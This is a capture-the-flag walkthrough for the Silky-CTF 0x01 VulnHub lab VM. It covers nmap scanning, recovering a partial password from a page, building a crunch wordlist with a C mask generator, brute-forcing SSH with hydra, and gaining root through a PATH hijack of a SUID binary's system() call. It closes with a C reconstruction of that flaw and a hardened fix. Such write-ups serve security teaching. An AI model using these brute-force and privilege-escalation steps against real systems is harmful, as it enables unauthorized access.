SILKY-CTF 0x01 (VULNHUB)

LINK: https://download.vulnhub.com/silky/Silky-CTF_0x01.ova

root@kali:~# netdiscover -i eth0

Currently scanning: 192.168.118.0/16 | Screen View: Unique Hosts

7 Captured ARP Req/Rep packets, from 3 hosts. Total size: 420
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
192.168.222.2 00:50:56:ea:c4:b4 4 240 VMware, Inc.
192.168.222.141 00:0c:29:6f:21:8c 2 120 VMware, Inc.
192.168.222.254 00:50:56:ec:ed:df 1 60 VMware, Inc.

root@kali:~/Downloads# nmap -A 192.168.222.141
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-20 17:51 GMT
Nmap scan report for 192.168.222.141
Host is up (0.00043s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 49:e6:fa:4c:d5:60:06:3b:c0:a8:c9:cc:00:10:7e:04 (RSA)
| 256 29:1b:39:69:32:aa:ae:9f:72:83:29:d4:27:db:f8:af (ECDSA)
|_ 256 a0:05:9e:82:bc:9d:09:ce:8e:c5:40:b2:b2:93:c6:53 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/notes.txt
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:6F:21:8C (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms 192.168.222.141

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.09 seconds

Nmap's http-robots.txt script already flagged one disallowed entry. Opening http://192.168.222.141 in a browser shows only the stock Apache2 Debian default page, so the next stop is:

http://192.168.222.141/robots.txt

which returns:

User-agent: UniversalRobot/1.0
User-agent: mein-Robot

User-agent: *
Disallow: /notes.txt

The disallowed file is readable without authentication:

http://192.168.222.141/notes.txt

It contains one line of German:

Ich muss unbedingt das Passwort aus der Seite entfernen, immerhin fehlen die letzten 2 Zeichen. Aber trotzdem.

In English:

I absolutely have to remove the password from the page; after all, the last 2 characters are missing. But still.

So a password is exposed somewhere on the site, and only its last two characters are unknown.

The page source (view-source:http://192.168.222.141/) references a script, script.js:

view-source:http://192.168.222.141/script.js

The only content it shows is a comment:

// s1lKy

That is the password fragment the note refers to.

Five known characters plus two missing ones gives a 7-character password. crunch's -t takes a mask in which literal characters are kept verbatim (case-sensitive, so the prefix must be written s1lKy exactly as in the comment), ^ expands to crunch's symbol set and % to a digit. Guessing that the missing pair is a symbol followed by a digit:

root@kali:~/Downloads# crunch 7 7 -t 's1lKy^%' >> pass.txt
Crunch will now generate the following amount of data: 2640 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 330

330 lines is 33 symbols times 10 digits, small enough to try over SSH.
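As an added example (not part of the original write-up), the following C program re-implements crunch's -t mask expansion so the keyspace above can be computed, generated and searched without the tool. It follows crunch's placeholder rules (@ lower-case, , upper-case, % digit, ^ symbol, anything else a case-sensitive literal) and uses crunch's default 33-character symbol set, which is where the 330 lines come from; crunch's backslash escaping of placeholders is not implemented. The function names and the mask_generates check are my additions.

```c
/*
 * Added example: minimal re-implementation of crunch's -t mask expansion.
 * Placeholders as in crunch: @ lower, , upper, % digit, ^ symbol; other
 * characters are literals and case-sensitive. Symbol set is crunch's default
 * 33 characters, so 's1lKy^%' yields 33 x 10 = 330 candidates.
 * Build: gcc -Wall -o maskgen maskgen.c ; run: ./maskgen 's1lKy^%' > pass.txt
 */
#include <stdio.h>
#include <string.h>

static const char LOWER[]   = "abcdefghijklmnopqrstuvwxyz";
static const char UPPER[]   = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
static const char DIGITS[]  = "0123456789";
static const char SYMBOLS[] = "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/ ";

typedef int (*emit_fn)(const char *word, void *ctx);  /* return non-zero to stop early */

static const char *charset_for(char c)
{
    switch (c) {
    case '@': return LOWER;
    case ',': return UPPER;
    case '%': return DIGITS;
    case '^': return SYMBOLS;
    default:  return NULL;          /* literal character, copied verbatim */
    }
}

/* Keyspace size: product of the charset sizes of every placeholder. */
unsigned long long mask_count(const char *pattern)
{
    unsigned long long n = 1;
    for (; *pattern; pattern++) {
        const char *set = charset_for(*pattern);
        if (set) n *= strlen(set);
    }
    return n;
}

static int expand_rec(const char *pattern, size_t pos, char *buf, emit_fn emit, void *ctx)
{
    const char *set;
    if (pattern[pos] == '\0') {
        buf[pos] = '\0';
        return emit(buf, ctx);
    }
    set = charset_for(pattern[pos]);
    if (!set) {
        buf[pos] = pattern[pos];
        return expand_rec(pattern, pos + 1, buf, emit, ctx);
    }
    for (; *set; set++) {
        buf[pos] = *set;
        if (expand_rec(pattern, pos + 1, buf, emit, ctx))
            return 1;
    }
    return 0;
}

/* Enumerate every word the mask describes. Returns 1 if emit stopped the walk,
 * 0 if the keyspace was exhausted, -1 if the pattern does not fit the buffer. */
int mask_expand(const char *pattern, emit_fn emit, void *ctx)
{
    char buf[128];
    if (strlen(pattern) >= sizeof buf) return -1;
    return expand_rec(pattern, 0, buf, emit, ctx);
}

static int emit_print(const char *word, void *ctx) { (void)ctx; puts(word); return 0; }
static int emit_match(const char *word, void *ctx) { return strcmp(word, (const char *)ctx) == 0; }

/* Does the mask cover a given candidate? Worth checking before a long hydra run:
 * the lower-case mask 's1lky^%' can never produce 's1lKy#5'. */
int mask_generates(const char *pattern, const char *candidate)
{
    return mask_expand(pattern, emit_match, (void *)candidate) == 1;
}

int main(int argc, char **argv)
{
    const char *pattern = argc > 1 ? argv[1] : "s1lKy^%";
    fprintf(stderr, "%llu candidates for %s\n", mask_count(pattern), pattern);
    return mask_expand(pattern, emit_print, NULL) < 0;
}
```

Run it with the mask as its single argument and redirect stdout to the wordlist; the candidate count goes to stderr so it does not end up in the file.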

Exploit:

The only username hint is the VM's name, hence -l silky. hydra's warning about parallel SSH tasks is worth heeding against real targets (-t 4); here 330 candidates finish in about two minutes even at the default 16 tasks.

root@kali:~/Downloads# hydra -l silky -P pass.txt 192.168.222.141 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-10-20 17:59:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 330 login tries (l:1/p:330), ~21 tries per task
[DATA] attacking ssh://192.168.222.141:22/
[STATUS] 178.00 tries/min, 178 tries in 00:01h, 154 to do in 00:01h, 16 active

login: silky
password: s1lKy#5

root@kali:~/Downloads# ssh silky@192.168.222.141
silky@192.168.222.141's password:
Linux Silky-CTF 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 14 04:04:41 2019 from 192.168.178.22

silky@Silky-CTF:~$

With a shell as silky, enumerate SUID binaries. Everything in the list belongs to a stock Debian package except /usr/bin/sky:

silky@Silky-CTF:~$ find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/ping
/bin/mount
/bin/umount
/bin/ntfs-3g
/bin/fusermount
/usr/bin/newgrp
/usr/bin/sky
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/sbin/pppd

silky@Silky-CTF:~$ /usr/bin/sky
Seide ist ein tierischer Faserstoff. Sie wird aus den Kokons der Seidenraupe, der Larve des Seidenspinners, gewonnen.
gezeichnet:
root

The German reads "Silk is an animal fibre. It is obtained from the cocoons of the silkworm, the larva of the silk moth. signed:". The "root" after it is not part of the text: the binary is SUID root and prints the output of whoami. Checking how it does that:

silky@Silky-CTF:~$ strings /usr/bin/sky
/lib64/ld-linux-x86-64.so.2
04I0KBY
libc.so.6
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
AWAVA
AUATL
[]A\A]A^A_
echo 'Seide ist ein tierischer Faserstoff. Sie wird aus den Kokons der Seidenraupe, der Larve des Seidenspinners, gewonnen.
gezeichnet:'; whoami
;*3$"
GCC: (Debian 6.3.0-18+deb9u1) 6.3.0 20170516
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.6972
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
sky.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment

Two lines in the strings output matter: system is imported from libc, and the string echo '...'; whoami is the one command handed to it. system() passes that string to /bin/sh -c in the caller's environment, and whoami is a bare name, so the shell resolves it through PATH, which the unprivileged caller controls. Because the process runs with euid 0, whatever PATH yields first for whoami runs as root.

The fake whoami below contains only the text /bin/sh. It has no shebang, but when execve() fails with ENOEXEC the shell runs the file as a script, so it spawns a shell. On Debian /bin/sh is dash, which keeps the inherited effective uid; bash would drop it unless started with -p.

silky@Silky-CTF:~$ cd /tmp

silky@Silky-CTF:/tmp$ echo '/bin/sh' > whoami

silky@Silky-CTF:/tmp$ chmod 777 whoami

silky@Silky-CTF:/tmp$ export PATH=/tmp:$PATH

silky@Silky-CTF:/tmp$ /usr/bin/sky
Seide ist ein tierischer Faserstoff. Sie wird aus den Kokons der Seidenraupe, der Larve des Seidenspinners, gewonnen.
gezeichnet:

# id
uid=1000(silky) gid=1000(silky) euid=0(root) Gruppen=1000(silky),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),119(scanner)

(Gruppen is groups in the VM's German locale.) Only the effective uid is root, because sky never calls setuid(); that is still enough to read /root.
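The flaw and its fix side by side, as an added example that is not code from the write-up or the Silky-CTF image: vulnerable_sky() reconstructs the logic the strings output reveals (a single system() call), hardened_sky() is a proposed safe replacement (no shell, absolute path, fixed environment), and find_in_path() is a deliberately simplified model of /bin/sh's command lookup that path_hijack_demo() uses to reproduce the hijack on any Linux host without needing a SUID binary. The function names, the temporary directory name and the fixed PATH=/usr/bin:/bin are my choices.

```c
/*
 * Added example, not the write-up's or the VM's code. vulnerable_sky() mirrors what
 * `strings /usr/bin/sky` shows; hardened_sky() is a proposed fix; find_in_path() is
 * a simplified model of /bin/sh's lookup used by path_hijack_demo() to reproduce the
 * attack without a SUID binary. Build: gcc -Wall -o sky_demo sky_demo.c
 */
#define _GNU_SOURCE
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

#define BANNER "Seide ist ein tierischer Faserstoff. Sie wird aus den Kokons der " \
               "Seidenraupe, der Larve des Seidenspinners, gewonnen.\ngezeichnet:"

/* The original: /bin/sh -c resolves "whoami" via the caller's PATH, with euid 0. */
int vulnerable_sky(void)
{
    return system("echo '" BANNER "'; whoami");
}

/* Proposed fix: no shell, absolute path, fixed environment. The SUID bit itself is
 * the real flaw (printing a name needs no privilege), so `chmod u-s` comes first. */
int hardened_sky(void)
{
    char *const argv[] = { "whoami", NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };   /* caller's PATH discarded */
    int status;
    pid_t pid;
    puts(BANNER);
    fflush(stdout);                 /* flush before fork so the child inherits no buffer */
    pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve("/usr/bin/whoami", argv, envp);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Model of the shell's lookup for a bare command name: the first PATH entry holding
 * an executable regular file wins. An empty entry means ".", so "PATH=:/usr/bin" is
 * as hijackable as "PATH=/tmp:/usr/bin". */
const char *find_in_path(const char *cmd, const char *path_env, char *out, size_t outsz)
{
    const char *p = path_env;
    for (;;) {
        const char *end = strchr(p, ':');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        const char *dir = len ? p : ".";
        struct stat st;
        int n = snprintf(out, outsz, "%.*s/%s", (int)(len ? len : 1), dir, cmd);
        if (n > 0 && (size_t)n < outsz && stat(out, &st) == 0 &&
            S_ISREG(st.st_mode) && (st.st_mode & S_IXUSR))
            return out;
        if (!end) return NULL;
        p = end + 1;
    }
}

/* Plant a fake whoami in a fresh directory, prepend it to PATH as the write-up did,
 * and check what each variant would execute. Returns 1 when the PATH-based lookup
 * picks the fake and the fixed PATH does not; -1 on setup failure. */
int path_hijack_demo(void)
{
    const char *tmp = getenv("TMPDIR");
    char dir[PATH_MAX], fake[PATH_MAX], attacker_path[PATH_MAX + 32], resolved[PATH_MAX];
    const char *v, *h;
    int hijacked, hardened_safe;
    FILE *f;

    snprintf(dir, sizeof dir, "%s/hijack.XXXXXX", tmp ? tmp : "/tmp");
    if (!mkdtemp(dir)) return -1;
    snprintf(fake, sizeof fake, "%s/whoami", dir);
    if (!(f = fopen(fake, "w"))) { rmdir(dir); return -1; }
    fputs("/bin/sh\n", f);         /* the payload the write-up put into whoami */
    fclose(f);
    chmod(fake, 0755);
    snprintf(attacker_path, sizeof attacker_path, "%s:/usr/bin:/bin", dir);  /* PATH=/tmp:$PATH */

    v = find_in_path("whoami", attacker_path, resolved, sizeof resolved);
    hijacked = v != NULL && strcmp(v, fake) == 0;
    h = find_in_path("whoami", "/usr/bin:/bin", resolved, sizeof resolved);
    hardened_safe = h == NULL || strcmp(h, fake) != 0;

    unlink(fake);
    rmdir(dir);
    return hijacked && hardened_safe;
}

int main(void)
{
    printf("attacker PATH hijacks whoami, fixed PATH does not: %s\n",
           path_hijack_demo() == 1 ? "yes" : "no");
    return 0;
}
```

The demo never executes the planted file; it only shows which path each lookup selects, which is the whole difference between the two versions. Note that hardened_sky() still runs whoami as root if the binary keeps its SUID bit, which is why removing the bit is the first fix and the execve() hygiene is the fallback for helpers that genuinely need privilege.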

# cd /root

# cat flag.txt
███████╗██╗██╗ ██╗ ██╗██╗ ██╗ ██████╗████████╗███████╗
██╔════╝██║██║ ██║ ██╔╝╚██╗ ██╔╝ ██╔════╝╚══██╔══╝██╔════╝
███████╗██║██║ █████╔╝ ╚████╔╝█████╗██║ ██║ █████╗
╚════██║██║██║ ██╔═██╗ ╚██╔╝ ╚════╝██║ ██║ ██╔══╝
███████║██║███████╗██║ ██╗ ██║ ╚██████╗ ██║ ██║
╚══════╝╚═╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝

flag: 489ca3ccb71640cce1a618a5dea48c25

Congrats 😉

@SAKSHAM DIXIT